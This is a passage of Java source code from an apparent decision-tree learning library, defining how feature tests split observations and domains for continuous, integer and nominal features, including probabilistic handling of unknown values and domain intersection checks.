int index_feature_in_e = ds.indexOfFeature(name);
LocalEmpiricalMeasure [] ret = new LocalEmpiricalMeasure[2];
ret[0] = new LocalEmpiricalMeasure(0);
ret[1] = new LocalEmpiricalMeasure(0);
double [] p_loc, p_new;
Observation oo;
int i;
for (i=0;i<parent_measure.observations_indexes.length;i++){
p_new = new double [2];
oo = ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]);
if ((!Observation.FEATURE_IS_UNKNOWN(oo, index_feature_in_e))
&& (!type.equals(oo.typed_features.elementAt(index_feature_in_e).type)))
Dataset.perror(
"FeatureTest.class :: type mismatch to split examples ( "
+ type
+ " != "
+ oo.typed_features.elementAt(index_feature_in_e).type
+ ")");
p_loc = share_observation_goes_left(oo, ds, f_split);
p_new[0] = p_loc[0] * parent_measure.proportions[i];
p_new[1] = p_loc[1] * parent_measure.proportions[i];
if (p_new[0] + p_new[1] == 0.0)
Dataset.perror("Feature.class :: observation count split in zero probabilities");
if (p_new[0] > 0.0)
ret[0].add(parent_measure.observations_indexes[i], p_new[0]);
if (p_new[1] > 0.0)
ret[1].add(parent_measure.observations_indexes[i], p_new[1]);
}
if ( (!ret[0].contains_indexes()) && (!ret[1].contains_indexes()) )
Dataset.perror("Feature.class :: no indexes kept from " + parent_measure);
if (!ret[0].contains_indexes())
ret[0] = null;
if (!ret[1].contains_indexes())
ret[1] = null;
return ret;
}
public int [][] split_observations(int [] observation_indexes, Dataset ds, Feature f_split, boolean unspecified_attribute_handling_biased){
// returns an array with two arrays: ret[0] = left observations; ret[1] = right observations
// they must match with indexes in dataset
if (observation_indexes == null)
return null;
int index_feature_in_e = ds.indexOfFeature(name);
Vector <Integer> left_indexes = new Vector<>();
Vector <Integer> right_indexes = new Vector<>();
int [][] ret = new int [2][];
int i;
for (i=0;i<observation_indexes.length;i++){
if ((!Observation.FEATURE_IS_UNKNOWN(
ds.observations_from_file.elementAt(observation_indexes[i]), index_feature_in_e))
&& (!type.equals(
ds.observations_from_file
.elementAt(observation_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type)))
Dataset.perror(
"FeatureTest.class :: type mismatch to split examples ( "
+ type
+ " != "
+ ds.observations_from_file
.elementAt(observation_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type
+ ")");
if (observation_goes_left(ds.observations_from_file.elementAt(observation_indexes[i]), ds, f_split, unspecified_attribute_handling_biased))
left_indexes.addElement(new Integer(observation_indexes[i]));
else
right_indexes.addElement(new Integer(observation_indexes[i]));
}
ret[0] = new int[left_indexes.size()];
ret[1] = new int[right_indexes.size()];
for (i=0;i<left_indexes.size();i++)
ret[0][i] = left_indexes.elementAt(i).intValue();
for (i=0;i<right_indexes.size();i++)
ret[1][i] = right_indexes.elementAt(i).intValue();
// check size sum
if (ret[0].length + ret[1].length != observation_indexes.length)
Dataset.perror(
"FeatureTest.class :: size mismatch to split examples ( "
+ ret[0].length
+ " + "
+ ret[1].length
+ " != "
+ observation_indexes.length
+ ")");
return ret;
}
public Feature [] split_feature(Dataset ds, Feature f, boolean check_non_zero_measure, boolean check_consistency){
// returns TWO features by applying this to f, [left, right]
// thus, USES THE DOMAIN OF f, NOT that in ds
Feature [] ft = new Feature[2];
Feature left = null, right = null;
Vector <String> vright;
Vector <String> moda, modaleft, modaright;
int i;
if (check_consistency)
checkConsistency(ds, f, check_non_zero_measure); // after that, split can guarantee non-zero support measure on both features, ASSUMING f is in a Tree (not from a Dataset)
if (Feature.IS_CONTINUOUS(f.type)){
left = new Feature(f.name, f.type, f.modalities, f.dmin, double_test, check_non_zero_measure);
right = new Feature(f.name, f.type, f.modalities, double_test, f.dmax, check_non_zero_measure);
}else if (Feature.IS_INTEGER(f.type)){
left = new Feature(f.name, f.type, f.modalities, f.imin, int_test);
right = new Feature(f.name, f.type, f.modalities, int_test + 1, f.imax); // CHECK: was true
}else if (Feature.IS_NOMINAL(f.type)){
moda = getStringTest(ds); // get all String corresponding to the test
if (moda == null)
Dataset.perror("Feature.class :: no test for nominal feature " + f);
// compute modaleft
modaleft = new Vector <>();
modaright = new Vector <>();
for (i=0;i<f.modalities.size();i++)
if (moda.contains(f.modalities.elementAt(i)))
modaleft.addElement(new String(f.modalities.elementAt(i)));
else
modaright.addElement(new String(f.modalities.elementAt(i)));
if (modaleft.size() == 0)
Dataset.perror("Feature.class :: no modality to add to the left split");
if (modaright.size() == 0)
Dataset.perror("Feature.class :: no modality to add to the right split");
left = new Feature(f.name, f.type, modaleft, f.dmin, f.dmax);
right = new Feature(f.name, f.type, modaright, f.dmin, f.dmax);
}
ft[0] = left;
ft[1] = right;
return ft;
}
public double [] share_observation_goes_left(Observation e, Dataset ds, Feature f_node){
// path followed in the tree by an observation
// continuous OR integer values : <= is left, > is right
// nominal values : in the set is left, otherwise is right
// f_node = feature split by this, IN A TREE
// returns an array[2], [0] = p_left; [1] = p_right
// both values sum to 1.0 and can both be non-zero when the feature value is unknown
int index_feature_in_e = ds.indexOfFeature(name);
checkConsistency(ds, f_node, false);
double cv;
int ci;
String nv;
Vector <String> ssv;
int i;
double p_left;
double [] ret = new double[2];
boolean found = false;
p_left = -1.0;
if (Observation.FEATURE_IS_UNKNOWN(e, index_feature_in_e)){
if (Feature.IS_CONTINUOUS(type)){
if (f_node.dmax == f_node.dmin)
Dataset.perror("Feature.class :: f_node.dmax = " + f_node.dmax + " == f_node.dmin ");
p_left = ( double_test - f_node.dmin ) / (f_node.dmax - f_node.dmin);
}else if (Feature.IS_INTEGER(type)){
if (f_node.imax == f_node.imin)
Dataset.perror("Feature.class :: f_node.imax = " + f_node.imax + " == f_node.imin ");
p_left = ( (double) int_test - f_node.imin + 1 ) / ((double) f_node.imax - f_node.imin + 1);
}else if (Feature.IS_NOMINAL(type))
p_left = ((double) boolarray_to_string_test.cardinality())/((double) f_node.modalities.size());
else
Dataset.perror("Feature.class :: no type available for feature " + this);
}else if (Feature.IS_CONTINUOUS(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.NOMINAL))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.INTEGER)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a Double");
cv = e.typed_features.elementAt(index_feature_in_e).dv;
if (cv <= double_test)
p_left = 1.0;
else
p_left = 0.0;
}else if (Feature.IS_INTEGER(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.NOMINAL))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.CONTINUOUS)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a Double");
ci = e.typed_features.elementAt(index_feature_in_e).iv;
if (ci <= int_test)
p_left = 1.0;
else
p_left = 0.0;
}else if (Feature.IS_NOMINAL(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.CONTINUOUS))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.INTEGER)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a String");
nv = e.typed_features.elementAt(index_feature_in_e).sv;
ssv = getStringTest(ds);
found = false;
i = 0;
do{
if (nv.equals((String) ssv.elementAt(i)))
found = true;
else
i++;
}while( (!found) && (i<ssv.size()) );
if (found)
p_left = 1.0;
else
p_left = 0.0;
}else
Dataset.perror("Feature.class :: no type / value available for feature " + this);
if (p_left == -1.0)
Dataset.perror("Feature.class :: error in the computation of p_left ");
ret[0] = p_left;
ret[1] = 1.0 - p_left;
return ret;
}
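  // Worked example (illustrative, not in the original code): with a CONTINUOUS
  // f_node whose domain is [0.0, 10.0] and a test double_test = 3.0, an
  // observation with an unknown value for this feature gets
  //   p_left = (3.0 - 0.0) / (10.0 - 0.0) = 0.3,   p_right = 0.7,
  // i.e. 30% of its mass goes to the left branch and 70% to the right one.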
public boolean observation_goes_left(Observation e, Dataset ds, Feature f_node, boolean unspecified_attribute_handling_biased){
// path followed in the tree by an observation
// continuous OR integer values : <= is left, > is right
// nominal values : in the set is left, otherwise is right
// f_node = feature split by this, IN A TREE
// unspecified_attribute_handling_biased = true => uses local domain and split to decide random branching, else Bernoulli(0.5)
int index_feature_in_e = ds.indexOfFeature(name);
checkConsistency(ds, f_node, false);
// important: for nominal attributes, ensures the strings corresponding to this are a subset of f_node.modalities
double cv;
int ci;
String nv;
Vector <String> ssv;
int i;
double p_left;
if (Observation.FEATURE_IS_UNKNOWN(e, index_feature_in_e)){
if (!unspecified_attribute_handling_biased){
if (Statistics.RANDOM_P_NOT_HALF() < 0.5)
return true;
else
return false;
}else{
p_left = -1.0;
if (Feature.IS_CONTINUOUS(type)){
if (f_node.dmax == f_node.dmin)
Dataset.perror("Feature.class :: f_node.dmax = " + f_node.dmax + " == f_node.dmin ");
p_left = ( double_test - f_node.dmin ) / (f_node.dmax - f_node.dmin);
}else if (Feature.IS_INTEGER(type)){
if (f_node.imax == f_node.imin)
Dataset.perror("Feature.class :: f_node.imax = " + f_node.imax + " == f_node.imin ");
p_left = ( (double) int_test - f_node.imin + 1 ) / ((double) f_node.imax - f_node.imin + 1);
}else if (Feature.IS_NOMINAL(type))
p_left = ((double) boolarray_to_string_test.cardinality())/((double) f_node.modalities.size());
else
Dataset.perror("Feature.class :: no type available for feature " + this);
if (Statistics.RANDOM_P_NOT(p_left) < p_left)
return true;
else
return false;
}
}
if (Feature.IS_CONTINUOUS(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.NOMINAL))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.INTEGER)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a Double");
cv = e.typed_features.elementAt(index_feature_in_e).dv;
if (cv <= double_test)
return true;
return false;
}else if (Feature.IS_INTEGER(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.NOMINAL))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.CONTINUOUS)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a Double");
ci = e.typed_features.elementAt(index_feature_in_e).iv;
if (ci <= int_test)
return true;
return false;
}else if (Feature.IS_NOMINAL(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.CONTINUOUS))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.INTEGER)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a String");
nv = e.typed_features.elementAt(index_feature_in_e).sv;
ssv = getStringTest(ds);
// tag_opt
for (i=0;i<ssv.size();i++){
if (nv.equals((String) ssv.elementAt(i)))
return true;
}
return false;
}else
Dataset.perror("Feature.class :: no type available for feature " + this);
return false;
}
public static FeatureTest copyOf(FeatureTest fv, Feature f){
if (!fv.name.equals(f.name))
Dataset.perror("FeatureTest.class :: no copy possible using features of different names");
FeatureTest fr = null;
if (fv.type.equals(Feature.CONTINUOUS))
fr = new FeatureTest(fv.getDoubleTest(), f);
else if (fv.type.equals(Feature.INTEGER))
fr = new FeatureTest(fv.getIntTest(), f);
else if (fv.type.equals(Feature.NOMINAL))
fr = new FeatureTest(fv.getBoolArrayToStringTest(), f);
else
Dataset.perror("FeatureTest.class :: no such type as " + fv.type);
return fr;
}
public boolean equals(Object o){
if (o == this)
return true;
if (!(o instanceof FeatureTest))
return false;
FeatureTest ft = (FeatureTest) o;
if (!ft.type.equals(type))
return false;
if ( (type.equals(Feature.NOMINAL)) && (!boolarray_to_string_test.equals(ft.getBoolArrayToStringTest())) )
return false;
else if ( (type.equals(Feature.INTEGER)) && (int_test != ft.getIntTest()) )
return false;
else if ( (type.equals(Feature.CONTINUOUS)) && (double_test != ft.getDoubleTest()) )
return false;
return true;
}
public void checkConsistency(Feature f){
if (!type.equals(f.type))
Dataset.perror(
"FeatureTest.class :: incompatible feature types (" + type + " vs " + f.type + ")");
if ( (type.equals(Feature.NOMINAL)) && (f.modalities == null) )
Dataset.perror("FeatureTest.class :: test computed on a feature w/o modalities");
}
public void checkConsistency(Dataset ds, Feature f, boolean check_non_zero_measure){
if (!type.equals(f.type))
Dataset.perror(
"FeatureTest.class :: incompatible feature types ("
+ type
+ " vs Feature "
+ f.type
+ ")");
if (!name.equals(f.name))
Dataset.perror(
"FeatureTest.class :: incompatible feature names ("
+ name
+ " vs Feature "
+ f.name
+ ")");
if (type.equals(Feature.NOMINAL)){
if (f.modalities == null)
Dataset.perror("FeatureTest.class :: empty modalities in Feature for test's consistency");
int i;
Vector<String> vs = getStringTest(ds);
if (check_non_zero_measure){
        // must have a modality not in the test AND the test must contain at least one element
boolean found = false;
if (vs.size() == 0)
Dataset.perror("FeatureTest.class :: [check_non_zero_measure] test has no String " + f);
// checks that at least 1 modality of f is in the test (goes left)
found = false;
i = 0;
do{
if (vs.contains(f.modalities.elementAt(i)))
found = true;
else
i++;
}while( (!found) && (i<f.modalities.size()) );
if (!found)
Dataset.perror("FeatureTest.class :: all modalities of " + this + " are not in " + f);
// checks that at least 1 modality of f is not in the test (goes right)
found = false;
i = 0;
do{
if (!vs.contains(f.modalities.elementAt(i)))
found = true;
else
i++;
}while( (!found) && (i<f.modalities.size()) );
if (!found)
Dataset.perror("FeatureTest.class :: all modalities of " + f + " are in " + this);
}
}else if (type.equals(Feature.CONTINUOUS)){
// does NOT ensure non zero measure
if ((double_test < f.dmin) || (double_test > f.dmax))
Dataset.perror(
"FeatureTest.class :: test value " + double_test + " not in domain of Feature " + f);
if (check_non_zero_measure){
// check double_test \in (f.dmin, f.dmax)
if ((double_test <= f.dmin) || (double_test >= f.dmax))
Dataset.perror(
"FeatureTest.class :: [check_non_zero_measure] test value "
+ double_test
+ " not strictly in domain of Feature "
+ f);
}
}else if (type.equals(Feature.INTEGER)){
// does NOT ensure non zero measure
if ((int_test < f.imin) || (int_test > f.imax))
Dataset.perror(
"FeatureTest.class :: test value " + int_test + " not in domain of Feature " + f);
if (check_non_zero_measure){
// check int_test \in {f.imin, f.min + 1, ..., f.imax - 1}
if (int_test == f.imax)
Dataset.perror(
"FeatureTest.class :: [check_non_zero_measure] test value "
+ int_test
+ " equals the right bound of Feature "
+ f);
}
}
}
public double getDoubleTest(){
//checkConsistency();
if (!type.equals(Feature.CONTINUOUS))
Dataset.perror("FeatureTest.class :: unauthorized call for double w/ type " + type);
return double_test;
}
public int getIntTest(){
//checkConsistency();
if (!type.equals(Feature.INTEGER))
Dataset.perror("FeatureTest.class :: unauthorized call for integer w/ type " + type);
return int_test;
}
public BoolArray getBoolArrayToStringTest(){
//checkConsistency();
if (!type.equals(Feature.NOMINAL))
Dataset.perror("FeatureTest.class :: unauthorized call for nominal w/ type " + type);
return boolarray_to_string_test;
}
public Vector<String> getStringTest(Dataset ds){
Feature fds = ds.features.elementAt(ds.indexOfFeature(name));
checkConsistency(fds);
Vector<String> vs = new Vector<>();
if (boolarray_to_string_test.size() != fds.modalities.size())
Dataset.perror(
"FeatureTest.class :: BoolArray "
+ boolarray_to_string_test
+ " of different *size* ("
+ boolarray_to_string_test.size()
+ ") than the number of modalities ("
+ fds.modalities.size()
+ ")");
int i;
for (i=0;i<fds.modalities.size();i++)
if (boolarray_to_string_test.get(i))
vs.addElement(new String(fds.modalities.elementAt(i)));
return vs;
}
public String toString(Dataset ds){
String v = name;
int i;
Vector <String> ssv;
if (Feature.IS_CONTINUOUS(type))
v += " <= " + DF6.format(double_test);
else if (Feature.IS_INTEGER(type))
v += " <= " + int_test;
else if (Feature.IS_NOMINAL(type)){
v += " in {";
ssv = getStringTest(ds);
for (i = 0; i < ssv.size();i++){
v += ssv.elementAt(i);
if (i<ssv.size() - 1)
v += ", ";
}
v += "}";
}else
Dataset.perror("FeatureTest.class :: no type available for feature " + this);
return v;
}
}
/**************************************************************************************************************************************
* Class FeatureValue
* provides encapsulation for all types that a feature can take, incl. unknown value
*****/
class FeatureValue implements Debuggable{
public static String S_UNKNOWN = "-1";
public static boolean IS_UNKNOWN(double d){
String s = "" + d;
return s.equals(S_UNKNOWN);
}
public static boolean IS_UNKNOWN(int i){
String s = "" + i;
return s.equals(S_UNKNOWN);
}
public static boolean IS_UNKNOWN(String s){
return s.equals(S_UNKNOWN);
}
public static boolean IS_UNKNOWN(Object o){
if (!o.getClass().getSimpleName().equals("FeatureValue"))
return false;
FeatureValue v = (FeatureValue) o;
if (v.type.equals(Feature.UNKNOWN_VALUE))
return true;
return false;
}
boolean is_unknown;
double dv;
int iv;
String sv;
String type;
FeatureValue(){
is_unknown = true;
type = Feature.UNKNOWN_VALUE;
iv = Feature.FORBIDDEN_VALUE;
dv = (double) Feature.FORBIDDEN_VALUE;
sv = "" + Feature.FORBIDDEN_VALUE;
}
FeatureValue(String s){
sv = s;
is_unknown = false;
type = Feature.NOMINAL;
iv = Feature.FORBIDDEN_VALUE;
dv = (double) Feature.FORBIDDEN_VALUE;
}
FeatureValue(double d){
dv = d;
is_unknown = false;
type = Feature.CONTINUOUS;
iv = Feature.FORBIDDEN_VALUE;
sv = "" + Feature.FORBIDDEN_VALUE;
}
FeatureValue(int i){
iv = i;
is_unknown = false;
type = Feature.INTEGER;
dv = (double) Feature.FORBIDDEN_VALUE;
sv = "" + Feature.FORBIDDEN_VALUE;
}
public String toString(){
if (type.equals(Feature.UNKNOWN_VALUE))
return "[?]";
else if (type.equals(Feature.NOMINAL))
return sv;
else if (type.equals(Feature.INTEGER))
return "" + iv;
else if (type.equals(Feature.CONTINUOUS))
return "" + dv;
else
Dataset.perror("FeatureValue.class :: no such type as " + type);
return "";
}
public static FeatureValue copyOf(FeatureValue fv){
if (fv.type.equals(Feature.UNKNOWN_VALUE))
return new FeatureValue();
else if (fv.type.equals(Feature.NOMINAL))
return new FeatureValue(fv.sv);
else if (fv.type.equals(Feature.CONTINUOUS))
return new FeatureValue(fv.dv);
else if (fv.type.equals(Feature.INTEGER))
return new FeatureValue(fv.iv);
Dataset.perror("FeatureValue.class :: no value type " + fv.type);
return new FeatureValue();
}
public boolean equals(Object o){
if (o == this)
return true;
if (!(o instanceof FeatureValue))
return false;
FeatureValue fv = (FeatureValue) o;
if (!fv.type.equals(type))
return false;
if ( (is_unknown) && (fv.is_unknown) )
return true;
else if ( (!is_unknown) && (fv.is_unknown) )
return false;
else if ( (is_unknown) && (!fv.is_unknown) )
return false;
if ( (type.equals(Feature.NOMINAL)) && (!sv.equals(fv.sv)) )
return false;
else if ( (type.equals(Feature.INTEGER)) && (iv != fv.iv) )
return false;
else if ( (type.equals(Feature.CONTINUOUS)) && (dv != fv.dv) )
return false;
return true;
}
}
/**************************************************************************************************************************************
* Class Feature
*****/
class Feature implements Debuggable{
public static String NOMINAL = "NOMINAL",
CONTINUOUS = "CONTINUOUS",
INTEGER = "INTEGER",
UNKNOWN_VALUE = "UNKNOWN_VALUE";
public static String TYPE[] = {Feature.NOMINAL, Feature.CONTINUOUS, Feature.INTEGER};
public static int TYPE_INDEX(String s){
int i = 0;
while(i<TYPE.length){
if (TYPE[i].equals(s))
return i;
i++;
}
return -1;
}
public static String DISPERSION_NAME[] = {"Entropy", "Variance", "Variance"};
// Discriminator relevant variables
public static int NUMBER_CONTINUOUS_TIES = 100;
// splits the interval in this number of internal splits (results in N+1 subintervals) FOR CONTINUOUS VARIABLES
public static int FORBIDDEN_VALUE = -100000;
// value to initialise doubles and int. Must not be in dataset
public static boolean DISPLAY_TESTS = true;
// All purpose variables
String name;
String type;
//Restricted to domain features, to collect the info about data (useful for splits)
double [] observed_doubles;
int [] observed_ints;
//Feature specific domain stuff -- redesign w/ a specific class for Generics
//characterisation of feature's domain
Vector <String> modalities; //applies only to Feature.NOMINAL features
double dmin, dmax; //applies only to Feature.CONTINUOUS features
int imin, imax; //applies only to Feature.INTEGER features
double dispertion_statistic_value;
// Entropy for nominal, variance for ordered
public static String SAVE_FEATURE(Feature f){
String ret = "";
ret += f.name + "\t" + f.type + "\t";
int i;
if (Feature.IS_NOMINAL(f.type)){
if (f.modalities == null)
ret += "null";
else if (f.modalities.size() == 0)
ret += "{}";
else
for (i=0;i<f.modalities.size();i++){
ret += (String) f.modalities.elementAt(i);
if (i<f.modalities.size()-1)
ret += "\t";
}
}else if (Feature.IS_CONTINUOUS(f.type)){
ret += f.dmin + "\t" + f.dmax;
}else if (Feature.IS_INTEGER(f.type)){
ret += f.imin + "\t" + f.imax;
}
return ret;
}
public double length(){
double l = -1.0;
if (Feature.IS_CONTINUOUS(type))
l = dmax - dmin;
else if (Feature.IS_INTEGER(type))
l = (double) imax - (double) imin + 1.0;
else if (Feature.IS_NOMINAL(type))
l = (double) modalities.size();
if (l<0.0)
Dataset.perror("Feature.class :: feature " + this + " has <0 length");
return l;
}
public boolean equals(Object o){
int i, j;
if (o == this)
return true;
if (!(o instanceof Feature))
return false;
Feature f = (Feature) o;
if (!(( ( (Feature.IS_NOMINAL(f.type)) && (Feature.IS_NOMINAL(type)) )
|| ( (Feature.IS_INTEGER(f.type)) && (Feature.IS_INTEGER(type)) )
|| ( (Feature.IS_CONTINUOUS(f.type)) && (Feature.IS_CONTINUOUS(type)) ) )))
return false;
if (Feature.IS_INTEGER(f.type))
if ( (f.imin != imin) || (f.imax != imax) )
return false;
if (Feature.IS_CONTINUOUS(f.type))
if ( (f.dmin != dmin) || (f.dmax != dmax) )
return false;
if (Feature.IS_NOMINAL(f.type)){
if (f.modalities.size() != modalities.size())
return false;
for (i=0;i<f.modalities.size();i++)
if (!((String) f.modalities.elementAt(i)).equals(modalities.elementAt(i)))
return false;
}
return true;
}
public static Feature copyOf(Feature f){
Vector <String> v = null;
double miv = (double) Feature.FORBIDDEN_VALUE, mav = (double) Feature.FORBIDDEN_VALUE;
if (Feature.IS_NOMINAL(f.type))
v = new Vector<String> (f.modalities);
else if (Feature.IS_CONTINUOUS(f.type)){
miv = f.dmin;
mav = f.dmax;
}else if (Feature.IS_INTEGER(f.type)){
miv = f.imin;
mav = f.imax;
}
Feature fn = new Feature(f.name, f.type, v, miv, mav);
if (Feature.IS_CONTINUOUS(f.type)){
fn.imin = fn.imax = Feature.FORBIDDEN_VALUE;
}else if (Feature.IS_INTEGER(f.type)){
fn.dmin = fn.dmax = Feature.FORBIDDEN_VALUE;
}else if (Feature.IS_NOMINAL(f.type)){
fn.imin = fn.imax = Feature.FORBIDDEN_VALUE;
fn.dmin = fn.dmax = Feature.FORBIDDEN_VALUE;
}
return fn;
}
public static boolean OBSERVATION_MATCHES_FEATURE(Observation e, Feature f, int f_index){
// checks whether e.typed_features.elementAt(f_index) is in domain of f
if (e.typed_features.elementAt(f_index).type.equals(Feature.UNKNOWN_VALUE))
Dataset.perror("Feature.class :: forbidden unknown value for OBSERVATION_MATCHES_FEATURE");
//return true;
String f_type = e.typed_features.elementAt(f_index).type;
double ed;
int ei;
String es;
if (f_type.equals(Feature.CONTINUOUS)){
if (!Feature.IS_CONTINUOUS(f.type))
Dataset.perror("Feature.class :: feature type mismatch -- CONTINUOUS");
ed = e.typed_features.elementAt(f_index).dv;
if ( (ed >= f.dmin) && (ed <= f.dmax) )
return true;
else
return false;
}else if (f_type.equals(Feature.INTEGER)){
if (!Feature.IS_INTEGER(f.type))
Dataset.perror("Feature.class :: feature type mismatch -- INTEGER");
ei = e.typed_features.elementAt(f_index).iv;
if ( (ei >= f.imin) && (ei <= f.imax) )
return true;
else
return false;
}else if (f_type.equals(Feature.NOMINAL)){
if (!Feature.IS_NOMINAL(f.type))
Dataset.perror("Feature.class :: feature type mismatch -- NOMINAL");
es = e.typed_features.elementAt(f_index).sv;
if (f.modalities.contains(es))
return true;
else
return false;
}else
Dataset.perror("Feature.class :: feature type unknown");
return true;
}
public static Feature CAP(Feature[] features, boolean ensure_non_zero_measure){
// cheaper option to compute the intersection of any number of features
// proceeds by feature; if one \cap returns null, returns null
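    // e.g. for two CONTINUOUS copies of the same feature the result spans [max of the dmin's, min of the
    // dmax's], and is null when that interval is empty (or reduced to a point if ensure_non_zero_measure).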
if ( (features == null) || (features.length == 0) )
Dataset.perror("Feature.class :: no intersection possible with 0 features");
int i, j;
String n = "", t;
for (i=0;i<features.length-1;i++){
if (!features[i].type.equals(features[i + 1].type))
Dataset.perror(
"Feature.class :: no intersection possible between features of different types");
if (!features[i].name.equals(features[i + 1].name))
Dataset.perror(
"Feature.class :: no intersection possible between features of different names");
}
t = features[0].type;
n = features[0].name;
if (Feature.IS_CONTINUOUS(t)){
double cap_dmin = -1.0, cap_dmax = -1.0;
for (i=0;i<features.length;i++){
if ( (i==0) || (features[i].dmin > cap_dmin) ){
cap_dmin = features[i].dmin;
}
if ( (i==0) || (features[i].dmax < cap_dmax) ){
cap_dmax = features[i].dmax;
}
}
System.out.println(n + "{" + cap_dmin + "," + cap_dmax + "}");
if ( (cap_dmin > cap_dmax) || ( (cap_dmin == cap_dmax) && (ensure_non_zero_measure) ) )
return null;
return new Feature(n, t, null, cap_dmin, cap_dmax);
}else if (Feature.IS_INTEGER(t)){
int cap_imin = -1, cap_imax = -1;
for (i=0;i<features.length;i++){
if ( (i==0) || (features[i].imin > cap_imin) ){
cap_imin = features[i].imin;
}
if ( (i==0) || (features[i].imax < cap_imax) ){
cap_imax = features[i].imax;
}
}
if (cap_imin > cap_imax)
return null;
return new Feature(n, t, null, (double) cap_imin, (double) cap_imax);
}else if (Feature.IS_NOMINAL(t)){
Vector <String> cap_string = null;
int sinit;
for (i=0;i<features.length;i++){
if (i==0)
cap_string = new Vector<>((Vector <String>) features[0].modalities);
else{
sinit = cap_string.size();
for (j=sinit-1;j>=0;j--){
if (!features[i].modalities.contains(cap_string.elementAt(j)))
cap_string.removeElementAt(j);
}
}
}
if ( (cap_string == null) || (cap_string.size() == 0) )
return null;
return new Feature(n, t, cap_string, -1.0, -1.0);
}else
Dataset.perror("Feature.class :: no type " + t + " for feature intersection");
return null;
}
public Feature cap(Feature t, boolean ensure_non_zero_measure){
    // returns the intersection feature; expensive, prefer the static CAP(...) variant instead
if ( (!name.equals(t.name)) || (!type.equals(t.type)) )
Dataset.perror("Feature.class :: feature intersection between different features");
Feature ret = Feature.copyOf(this);
int i;
if (Feature.IS_CONTINUOUS(type)){
if ( ( (ensure_non_zero_measure) && ( (dmax <= t.dmin) || (dmin >= t.dmax) ) )
|| ( (!ensure_non_zero_measure) && ( (dmax < t.dmin) || (dmin > t.dmax) ) ) )
return null;
ret.dmin = (dmin >= t.dmin) ? dmin : t.dmin;
ret.dmax = (dmax <= t.dmax) ? dmax : t.dmax;
}else if (Feature.IS_INTEGER(type)){
if ( (imax < t.imin) || (imin > t.imax) )
return null;
if (imax == t.imin){
ret.imin = ret.imax = imax;
}else if (imin == t.imax){
ret.imin = ret.imax = imin;
}else{
ret.imin = (imin >= t.imin) ? imin : t.imin;
ret.imax = (imax <= t.imax) ? imax : t.imax;
}
}else if (Feature.IS_NOMINAL(type)){
if ( (modalities == null) || (t.modalities == null) )
return null;
Vector <String> inter = new Vector<>();
for (i=0;i<modalities.size();i++)
if (t.modalities.contains(modalities.elementAt(i)))
inter.addElement(new String(modalities.elementAt(i)));
ret.modalities = inter;
}else
Dataset.perror("Feature.class :: feature type unknown");
return ret;
}
public static void TEST_UNION(Feature f_parent, Feature f_left, Feature f_right){
// controls the union of the children features is the parent
// ensures the children have non-empty domain
int i;
if ((!f_parent.type.equals(f_left.type)) || (!f_parent.type.equals(f_right.type)))
Dataset.perror(
"Feature.class :: parent feature of type "
+ f_parent.type
+ " but children: "
+ f_left.type
+ ", "
+ f_right.type);
if (Feature.IS_CONTINUOUS(f_parent.type)){
if ( (f_left.dmin != f_parent.dmin) || (f_right.dmax != f_parent.dmax) )
Dataset.perror("Feature.class :: double domain does not cover parent's range");
if (f_left.dmax != f_right.dmin)
Dataset.perror("Feature.class :: double domain union mismatch");
}else if (Feature.IS_INTEGER(f_parent.type)){
if ( (f_left.imin != f_parent.imin) || (f_right.imax != f_parent.imax) )
Dataset.perror("Feature.class :: integer domain does not cover parent's range");
if (f_left.imax + 1 != f_right.imin)
Dataset.perror(
"Feature.class :: integer domain union mismatch : f_left.imax = "
+ f_left.imax
+ ", f_right.imin = "
+ f_right.imin);
}else if (Feature.IS_NOMINAL(f_parent.type)){
if ( (f_left.modalities == null) || (f_right.modalities == null) )
Dataset.perror("Feature.class :: nominal domain has null domain in a child");
if ( (f_left.modalities.size() == 0) || (f_right.modalities.size() == 0) )
Dataset.perror("Feature.class :: nominal domain has empty domain in a child");
if (f_parent.modalities == null)
Dataset.perror("Feature.class :: nominal domain has null domain in parent");
if (f_parent.modalities.size() == 0)
Dataset.perror("Feature.class :: nominal domain has empty domain in parent");
for (i = 0; i < f_left.modalities.size(); i++)
if (!f_parent.modalities.contains((String) f_left.modalities.elementAt(i)))
Dataset.perror(
"Feature.class :: parent's nominal domain does not contain left child modality "
+ ((String) f_left.modalities.elementAt(i)));
for (i = 0; i < f_right.modalities.size(); i++)
if (!f_parent.modalities.contains((String) f_right.modalities.elementAt(i)))
Dataset.perror(
"Feature.class :: parent's nominal domain does not contain right child modality "
+ ((String) f_right.modalities.elementAt(i)));
if (f_left.modalities.size() + f_right.modalities.size() != f_parent.modalities.size())
Dataset.perror(
"Feature.class :: parent's nominal domain contains modalities not in children");
}
}
public static boolean IS_SUBFEATURE(Feature a, Feature b){
// checks if domain(a) \subseteq domain(b)
return IS_SUBFEATURE(a, -1, b, -1);
}
public static boolean IS_SUBFEATURE(Feature a, int index_a, Feature b, int index_b){
// checks if domain(a) \subseteq domain(b) AND returns an error if index_a != index_b (in myDomain.myDS.features)
// also checks inconsistencies: one of a or b must be a subfeature of the other AND the feature type values must have been computed
boolean anotinb, bnotina;
